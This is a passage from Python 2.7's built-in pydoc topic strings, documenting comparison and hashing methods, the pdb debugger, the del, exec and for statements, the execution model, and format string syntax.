for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n Called by comparison operations if rich comparison (see above) is\n not defined. Should return a negative integer if "self < other",\n zero if "self == other", a positive integer if "self > other". If\n no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n class instances are compared by object identity ("address"). See\n also the description of "__hash__()" for some important notes on\n creating *hashable* objects which support custom comparison\n operations and are usable as dictionary keys. (Note: the\n restriction that exceptions are not propagated by "__cmp__()" has\n been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n Called by built-in function "hash()" and for operations on members\n of hashed collections including "set", "frozenset", and "dict".\n "__hash__()" should return an integer. The only required property\n is that objects which compare equal have the same hash value; it is\n advised to somehow mix together (e.g. using exclusive or) the hash\n values for the components of the object that also play a part in\n comparison of objects.\n\n If a class does not define a "__cmp__()" or "__eq__()" method it\n should not define a "__hash__()" operation either; if it defines\n "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n not be usable in hashed collections. If a class defines mutable\n objects and implements a "__cmp__()" or "__eq__()" method, it\n should not implement "__hash__()", since hashable collection\n implementations require that a object\'s hash value is immutable (if\n the object\'s hash value changes, it will be in the wrong hash\n bucket).\n\n User-defined classes have "__cmp__()" and "__hash__()" methods by\n default; with them, all objects compare unequal (except with\n themselves) and "x.__hash__()" returns a result derived from\n "id(x)".\n\n Classes which inherit a "__hash__()" method from a parent class but\n change the meaning of "__cmp__()" or "__eq__()" such that the hash\n value returned is no longer appropriate (e.g. by switching to a\n value-based concept of equality instead of the default identity\n based equality) can explicitly flag themselves as being unhashable\n by setting "__hash__ = None" in the class definition. Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n', 'debugger': u'\n"pdb" --- The Python Debugger\n*****************************\n\n**Source code:** Lib/pdb.py\n\n======================================================================\n\nThe module "pdb" defines an interactive source code debugger for\nPython programs. It supports setting (conditional) breakpoints and\nsingle stepping at the source line level, inspection of stack frames,\nsource code listing, and evaluation of arbitrary Python code in the\ncontext of any stack frame. It also supports post-mortem debugging\nand can be called under program control.\n\nThe debugger is extensible --- it is actually defined as the class\n"Pdb". This is currently undocumented but easily understood by reading\nthe source. The extension interface uses the modules "bdb" and "cmd".\n\nThe debugger\'s prompt is "(Pdb)". Typical usage to run a program under\ncontrol of the debugger is:\n\n >>> import pdb\n >>> import mymodule\n >>> pdb.run(\'mymodule.test()\')\n > <string>(0)?()\n (Pdb) continue\n > <string>(1)?()\n (Pdb) continue\n NameError: \'spam\'\n > <string>(1)?()\n (Pdb)\n\n"pdb.py" can also be invoked as a script to debug other scripts. For\nexample:\n\n python -m pdb myscript.py\n\nWhen invoked as a script, pdb will automatically enter post-mortem\ndebugging if the program being debugged exits abnormally. After post-\nmortem debugging (or after normal exit of the program), pdb will\nrestart the program. Automatic restarting preserves pdb\'s state (such\nas breakpoints) and in most cases is more useful than quitting the\ndebugger upon program\'s exit.\n\nNew in version 2.4: Restarting post-mortem behavior added.\n\nThe typical usage to break into the debugger from a running program is\nto insert\n\n import pdb; pdb.set_trace()\n\nat the location you want to break into the debugger. You can then\nstep through the code following this statement, and continue running\nwithout the debugger using the "c" command.\n\nThe typical usage to inspect a crashed program is:\n\n >>> import pdb\n >>> import mymodule\n >>> mymodule.test()\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n File "./mymodule.py", line 4, in test\n test2()\n File "./mymodule.py", line 3, in test2\n print spam\n NameError: spam\n >>> pdb.pm()\n > ./mymodule.py(3)test2()\n -> print spam\n (Pdb)\n\nThe module defines the following functions; each enters the debugger\nin a slightly different way:\n\npdb.run(statement[, globals[, locals]])\n\n Execute the *statement* (given as a string) under debugger control.\n The debugger prompt appears before any code is executed; you can\n set breakpoints and type "continue", or you can step through the\n statement using "step" or "next" (all these commands are explained\n below). The optional *globals* and *locals* arguments specify the\n environment in which the code is executed; by default the\n dictionary of the module "__main__" is used. (See the explanation\n of the "exec" statement or the "eval()" built-in function.)\n\npdb.runeval(expression[, globals[, locals]])\n\n Evaluate the *expression* (given as a string) under debugger\n control. When "runeval()" returns, it returns the value of the\n expression. Otherwise this function is similar to "run()".\n\npdb.runcall(function[, argument, ...])\n\n Call the *function* (a function or method object, not a string)\n with the given arguments. When "runcall()" returns, it returns\n whatever the function call returned. The debugger prompt appears\n as soon as the function is entered.\n\npdb.set_trace()\n\n Enter the debugger at the calling stack frame. This is useful to\n hard-code a breakpoint at a given point in a program, even if the\n code is not otherwise being debugged (e.g. when an assertion\n fails).\n\npdb.post_mortem([traceback])\n\n Enter post-mortem debugging of the given *traceback* object. If no\n *traceback* is given, it uses the one of the exception that is\n currently being handled (an exception must be being handled if the\n default is to be used).\n\npdb.pm()\n\n Enter post-mortem debugging of the traceback found in\n "sys.last_traceback".\n\nThe "run*" functions and "set_trace()" are aliases for instantiating\nthe "Pdb" class and calling the method of the same name. If you want\nto access further features, you have to do this yourself:\n\nclass pdb.Pdb(completekey=\'tab\', stdin=None, stdout=None, skip=None)\n\n "Pdb" is the debugger class.\n\n The *completekey*, *stdin* and *stdout* arguments are passed to the\n underlying "cmd.Cmd" class; see the description there.\n\n The *skip* argument, if given, must be an iterable of glob-style\n module name patterns. The debugger will not step into frames that\n originate in a module that matches one of these patterns. [1]\n\n Example call to enable tracing with *skip*:\n\n import pdb; pdb.Pdb(skip=[\'django.*\']).set_trace()\n\n New in version 2.7: The *skip* argument.\n\n run(statement[, globals[, locals]])\n runeval(expression[, globals[, locals]])\n runcall(function[, argument, ...])\n set_trace()\n\n See the documentation for the functions explained above.\n', 'del': u'\nThe "del" statement\n*******************\n\n del_stmt ::= "del" target_list\n\nDeletion is recursively defined very similar to the way assignment is\ndefined. Rather than spelling it out in full details, here are some\nhints.\n\nDeletion of a target list recursively deletes each target, from left\nto right.\n\nDeletion of a name removes the binding of that name from the local or\nglobal namespace, depending on whether the name occurs in a "global"\nstatement in the same code block. If the name is unbound, a\n"NameError" exception will be raised.\n\nIt is illegal to delete a name from the local namespace if it occurs\nas a free variable in a nested block.\n\nDeletion of attribute references, subscriptions and slicings is passed\nto the primary object involved; deletion of a slicing is in general\nequivalent to assignment of an empty slice of the right type (but even\nthis is determined by the sliced object).\n', 'dict': u'\nDictionary displays\n*******************\n\nA dictionary display is a possibly empty series of key/datum pairs\nenclosed in curly braces:\n\n dict_display ::= "{" [key_datum_list | dict_comprehension] "}"\n key_datum_list ::= key_datum ("," key_datum)* [","]\n key_datum ::= expression ":" expression\n dict_comprehension ::= expression ":" expression comp_for\n\nA dictionary display yields a new dictionary object.\n\nIf a comma-separated sequence of key/datum pairs is given, they are\nevaluated from left to right to define the entries of the dictionary:\neach key object is used as a key into the dictionary to store the\ncorresponding datum. This means that you can specify the same key\nmultiple times in the key/datum list, and the final dictionary\'s value\nfor that key will be the last one given.\n\nA dict comprehension, in contrast to list and set comprehensions,\nneeds two expressions separated with a colon followed by the usual\n"for" and "if" clauses. When the comprehension is run, the resulting\nkey and value elements are inserted in the new dictionary in the order\nthey are produced.\n\nRestrictions on the types of the key values are listed earlier in\nsection The standard type hierarchy. (To summarize, the key type\nshould be *hashable*, which excludes all mutable objects.) Clashes\nbetween duplicate keys are not detected; the last datum (textually\nrightmost in the display) stored for a given key value prevails.\n', 'dynamic-features': u'\nInteraction with dynamic features\n*********************************\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n', 'else': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'exceptions': u'\nExceptions\n**********\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exec': u'\nThe "exec" statement\n********************\n\n exec_stmt ::= "exec" or_expr ["in" expression ["," expression]]\n\nThis statement supports dynamic execution of Python code. The first\nexpression should evaluate to either a Unicode string, a *Latin-1*\nencoded string, an open file object, a code object, or a tuple. If it\nis a string, the string is parsed as a suite of Python statements\nwhich is then executed (unless a syntax error occurs). [1] If it is an\nopen file, the file is parsed until EOF and executed. If it is a code\nobject, it is simply executed. For the interpretation of a tuple, see\nbelow. In all cases, the code that\'s executed is expected to be valid\nas file input (see section File input). Be aware that the "return"\nand "yield" statements may not be used outside of function definitions\neven within the context of code passed to the "exec" statement.\n\nIn all cases, if the optional parts are omitted, the code is executed\nin the current scope. If only the first expression after "in" is\nspecified, it should be a dictionary, which will be used for both the\nglobal and the local variables. If two expressions are given, they\nare used for the global and local variables, respectively. If\nprovided, *locals* can be any mapping object. Remember that at module\nlevel, globals and locals are the same dictionary. If two separate\nobjects are given as *globals* and *locals*, the code will be executed\nas if it were embedded in a class definition.\n\nThe first expression may also be a tuple of length 2 or 3. In this\ncase, the optional parts must be omitted. The form "exec(expr,\nglobals)" is equivalent to "exec expr in globals", while the form\n"exec(expr, globals, locals)" is equivalent to "exec expr in globals,\nlocals". The tuple form of "exec" provides compatibility with Python\n3, where "exec" is a function rather than a statement.\n\nChanged in version 2.4: Formerly, *locals* was required to be a\ndictionary.\n\nAs a side effect, an implementation may insert additional keys into\nthe dictionaries given besides those corresponding to variable names\nset by the executed code. For example, the current implementation may\nadd a reference to the dictionary of the built-in module "__builtin__"\nunder the key "__builtins__" (!).\n\n**Programmer\'s hints:** dynamic evaluation of expressions is supported\nby the built-in function "eval()". The built-in functions "globals()"\nand "locals()" return the current global and local dictionary,\nrespectively, which may be useful to pass around for use by "exec".\n\n-[ Footnotes ]-\n\n[1] Note that the parser only accepts the Unix-style end of line\n convention. If you are reading the code from a file, make sure to\n use *universal newlines* mode to convert Windows or Mac-style\n newlines.\n', 'execmodel': u'\nExecution model\n***************\n\n\nNaming and binding\n==================\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\non the interpreter command line the first argument) is a code block.\nA script command (a command specified on the interpreter command line\nwith the \'**-c**\' option) is a code block. The file read by the\nbuilt-in function "execfile()" is a code block. The string argument\npassed to the built-in function "eval()" and to the "exec" statement\nis a code block. The expression read and evaluated by the built-in\nfunction "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n---------------------------------\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n\n\nExceptions\n==========\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exprlists': u'\nExpression lists\n****************\n\n expression_list ::= expression ( "," expression )* [","]\n\nAn expression list containing at least one comma yields a tuple. The\nlength of the tuple is the number of expressions in the list. The\nexpressions are evaluated from left to right.\n\nThe trailing comma is required only to create a single tuple (a.k.a. a\n*singleton*); it is optional in all other cases. A single expression\nwithout a trailing comma doesn\'t create a tuple, but rather yields the\nvalue of that expression. (To create an empty tuple, use an empty pair\nof parentheses: "()".)\n', 'floating': u'\nFloating point literals\n***********************\n\nFloating point literals are described by the following lexical\ndefinitions:\n\n floatnumber ::= pointfloat | exponentfloat\n pointfloat ::= [intpart] fraction | intpart "."\n exponentfloat ::= (intpart | pointfloat) exponent\n intpart ::= digit+\n fraction ::= "." digit+\n exponent ::= ("e" | "E") ["+" | "-"] digit+\n\nNote that the integer and exponent parts of floating point numbers can\nlook like octal integers, but are interpreted using radix 10. For\nexample, "077e010" is legal, and denotes the same number as "77e10".\nThe allowed range of floating point literals is implementation-\ndependent. Some examples of floating point literals:\n\n 3.14 10. .001 1e100 3.14e-10 0e0\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator "-" and the\nliteral "1".\n', 'for': u'\nThe "for" statement\n*******************\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n', 'formatstrings': u'\nFormat String Syntax\n********************\n\nThe "str.format()" method and the "Formatter" class share the same\nsyntax for format strings (although in the case of "Formatter",\nsubclasses can define their own format string syntax).\n\nFormat strings contain "replacement fields" surrounded by curly braces\n"{}". Anything that is not contained in braces is considered literal\ntext, which is copied unchanged to the output. If you need to include\na brace character in the literal text, it can be escaped by doubling:\n"{{" and "}}".\n\nThe grammar for a replacement field is as follows:\n\n replacement_field ::= "{" [field_name] ["!" conversion] [":" format_spec] "}"\n field_name ::= arg_name ("." attribute_name | "[" element_index "]")*\n arg_name ::= [identifier | integer]\n attribute_name ::= identifier\n element_index ::= integer | index_string\n index_string ::= <any source character except "]"> +\n conversion ::= "r" | "s"\n format_spec ::= <described in the next section>\n\nIn less formal terms, the replacement field can start with a\n*field_name* that specifies the object whose value is to be formatted\nand inserted into the output instead of the replacement field. The\n*field_name* is optionally followed by a *conversion* field, which is\npreceded by an exclamation point "\'!\'", and a *format_spec*, which is\npreceded by a colon "\':\'". These specify a non-default format for the\nreplacement value.\n\nSee also the Format Specification Mini-Language section.\n\nThe *field_name* itself begins with an *arg_name* that is either a\nnumber or a keyword. If it\'s a number, it refers to a positional\nargument, and if it\'s a keyword, it refers to a named keyword\nargument. If the numerical arg_names in a format string are 0, 1, 2,\n... in sequence, they can all be omitted (not just some) and the\nnumbers 0, 1, 2, ... will be automatically inserted in that order.\nBecause *arg_name* is not quote-delimited, it is not possible to\nspecify arbitrary dictionary keys (e.g., the strings "\'10\'" or\n"\':-]\'") within a format string. The *arg_name* can be followed by any\nnumber of index or attribute expressions. An expression of the form\n"\'.name\'" selects the named attribute using "getattr()", while an\nexpression of the form "\'[index]\'" does an index lookup using\n"__getitem__()".\n\nChanged in version 2.7: The positional argument specifiers can be\nomitted, so "\'{} {}\'" is equivalent to "\'{0} {1}\'".\n\nSome simple format string examples:\n\n "First, thou shalt count to {0}" # References first positional argument\n "Bring me a {}" # Implicitly references the first positional argument\n "From {} to {}" # Same as "From {0} to {1}"\n "My quest is {name}" # References keyword argument \'name\'\n "Weight in tons {0.weight}" # \'weight\' attribute of first positional arg\n "Units destroyed: {players[0]}" # First element of keyword argument \'players\'.\n\nThe *conversion* field causes a type coercion before formatting.\nNormally, the job of formatting a value is done by the "__format__()"\nmethod of the value itself. However, in some cases it is desirable to\nforce a type to be formatted as a string, overriding its own\ndefinition of formatting. By converting the value to a string before\ncalling "__format__()", the normal formatting logic is bypassed.\n\nTwo conversion flags are currently supported: "\'!s\'" which calls\n"str()" on the value, and "\'!r\'" which calls "repr()".\n\nSome examples:\n\n "Harold\'s a clever {0!s}" # Calls str() on the argument first\n "Bring out the holy {name!r}" # Calls repr() on the argument first\n\nThe *format_spec* field contains a specification of how the value\nshould be presented, including such details as field width, alignment,\npadding, decimal precision and so on. Each value type can define its\nown "formatting mini-language" or interpretation of the *format_spec*.\n\nMost built-in types support a common formatting mini-language, which\nis described in the next section.\n\nA *format_spec* field can also include nested replacement fields\nwithin it. These nested replacement fields can contain only a field\nname; conversion flags and format specifications are not allowed. The\nreplacement fields within the format_spec are substituted before the\n*format_spec* string is interpreted. This allows the formatting of a\nvalue to be dynamically specified.\n\nSee the Format examples section for some examples.\n\n\nFormat Specification Mini-Language\n==================================\n\n"Format specifications" are used within replacement fields contained\nwithin a format string to define how individual values are presented\n(see Format String Syntax). They can also be passed directly to the\nbuilt-in "format()" function. Each formattable type may define how\nthe format specification is to be interpreted.\n\nMost built-in types implement the following options for format\nspecifications, although some of the formatting options are only\nsupported by the numeric types.\n\nA general convention is that an empty format string ("""") produces\nthe same result as if you had called "str()" on the value. A non-empty\nformat string typically modifies the result.\n\nThe general form of a *standard format specifier* is:\n\n format_spec ::= [[fill]align][sign][#][0][width][,][.precision][type]\n fill ::= <any character>\n align ::= "<" | ">" | "=" | "^"\n sign ::= "+" | "-" | " "\n width ::= integer\n precision ::= integer\n type ::= "b" | "c" | "d" | "e" | "E" | "f" | "F" | "g" | "G" | "n" | "o" | "s" | "x" | "X" | "%"\n\nIf a valid *align* value is specified, it can be preceded by a *fill*\ncharacter that can be any character and defaults to a space if\nomitted. Note that it is not possible to use "{" and "}" as *fill*\nchar while using the "str.format()" method; this limitation however\ndoesn\"t affect the "format()" function.\n\nThe meaning of the various alignment options is as follows:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\"<\"" | Forces the field to be left-aligned within the available |\n | | space (this is the default for most objects). |\n +-----------+------------------------------------------------------------+\n | "\">\"" | Forces the field to be right-aligned within the available |\n | | space (this is the default for numbers). |\n +-----------+------------------------------------------------------------+\n | "\"=\"" | Forces the padding to be placed after the sign (if any) |\n | | but before the digits. This is used for printing fields |\n | | in the form \"+000000120\". This alignment option is only |\n | | valid for numeric types. |\n +-----------+------------------------------------------------------------+\n | "\"^\"" | Forces the field to be centered within the available |\n | | space. |\n +-----------+------------------------------------------------------------+\n\nNote that unless a minimum field width is defined, the field width\nwill always be the same size as the data to fill it, so that the\nalignment option has no meaning in this case.\n\nThe *sign* option is only valid for number types, and can be one of\nthe following:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\"+\"" | indicates that a sign should be used for both positive as |\n | | well as negative numbers. |\n +-----------+------------------------------------------------------------+\n | "\"-\"" | indicates that a sign should be used only for negative |\n | | numbers (this is the default behavior). |\n +-----------+------------------------------------------------------------+\n | space | indicates that a leading space should be used on positive |\n | | numbers, and a minus sign on negative numbers. |\n +-----------+------------------------------------------------------------+\n\nThe "\"#\"" option is only valid for integers, and only for binary,\noctal, or hexadecimal output. If present, it specifies that the\noutput will be prefixed by "\"0b\"", "\"0o\"", or "\"0x\"", respectively.\n\nThe "\",\"" option signals the use of a comma for a thousands separator.\nFor a locale aware separator, use the "\"n\"" integer presentation type\ninstead.\n\nChanged in version 2.7: Added the "\",\"" option (see also **PEP 378**).\n\n*width* is a decimal integer defining the minimum field width. If not\nspecified, then the field width will be determined by the content.\n\nPreceding the *width* field by a zero ("\"0\"") character enables sign-\naware zero-padding for numeric types. This is equivalent to a *fill*\ncharacter of "\"0\"" with an *alignment* type of "\"=\"".\n\nThe *precision* is 